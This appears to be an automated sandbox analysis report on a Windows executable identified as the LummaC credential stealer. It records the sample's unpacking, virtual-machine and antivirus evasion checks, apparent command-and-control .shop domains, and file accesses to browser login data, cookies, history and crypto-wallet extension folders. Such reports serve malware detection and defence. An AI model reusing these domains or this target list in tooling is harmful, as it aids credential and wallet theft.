Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00426000 push eax; mov dword ptr [esp], ecx	0_2_00426005
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004418A8 push edx; ret	0_2_004418AA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02A6627D push edi; iretd	0_2_02A6627E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02A65029 pushad ; ret	0_2_02A6502A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02A66192 push esp; ret	0_2_02A6619C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02A631EE pushad ; ret	0_2_02A631EF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02A654ED push edi; ret	0_2_02A654F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04406267 push eax; mov dword ptr [esp], ecx	0_2_0440626C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_043ECE9E push esp; retf	0_2_043ECEA4

Source: file.exe

Static PE information: section name: .text entropy: 7.864433923714666

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 404	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3492	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: VMware
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000003.1762316213.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1727378356.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765200814.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762484682.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762072138.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762853508.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1821948107.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764223010.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763840024.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725431973.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1790433796.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: file.exe, 00000000.00000002.2032394694.0000000002A8D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00438180 LdrInitializeThunk,

0_2_00438180

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02A61FB3 push dword ptr fs:[00000030h]	0_2_02A61FB3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_043E0D90 mov eax, dword ptr fs:[00000030h]	0_2_043E0D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_043E092B mov eax, dword ptr fs:[00000030h]	0_2_043E092B

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: file.exe	String found in binary or memory: publicitttyps.shop
Source: file.exe	String found in binary or memory: answerrsdo.shop
Source: file.exe	String found in binary or memory: radiationnopp.shop
Source: file.exe	String found in binary or memory: affecthorsedpo.shop
Source: file.exe	String found in binary or memory: bargainnykwo.shop
Source: file.exe	String found in binary or memory: bannngwko.shop
Source: file.exe	String found in binary or memory: bouncedgowp.shop
Source: file.exe	String found in binary or memory: stationacutwo.shop
Source: file.exe	String found in binary or memory: benchillppwo.shop

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: file.exe, 00000000.00000003.1790433796.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1795851667.0000000002B2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2032635676.0000000002B31000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1795730443.0000000002B31000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1790347781.0000000002B2A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 3696, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000003.1762316213.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: file.exe, 00000000.00000003.1762316213.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: file.exe, 00000000.00000003.1762316213.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000000.00000003.1762316213.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: file.exe, 00000000.00000003.1762316213.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: file.exe, 00000000.00000003.1762853508.0000000002B29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: file.exe, 00000000.00000003.1727378356.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\BinancegX
Source: file.exe, 00000000.00000003.1762316213.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: file.exe, 00000000.00000003.1762316213.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe, 00000000.00000003.1762853508.0000000002B29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
